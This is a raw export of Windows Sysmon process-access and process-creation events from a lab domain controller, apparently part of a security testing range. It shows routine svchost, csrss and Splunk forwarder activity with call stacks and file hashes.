13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4400-000000009101}2660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8552-5FCF-4300-000000009101}28522816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8552-5FCF-4400-000000009101}2660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.182{10ACEC4A-8552-5FCF-4400-000000009101}2660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8552-5FCF-4200-000000009101}19202740C:\Windows\system32\cmd.exe{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.173{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-8552-5FCF-4200-000000009101}1920C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4200-000000009101}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 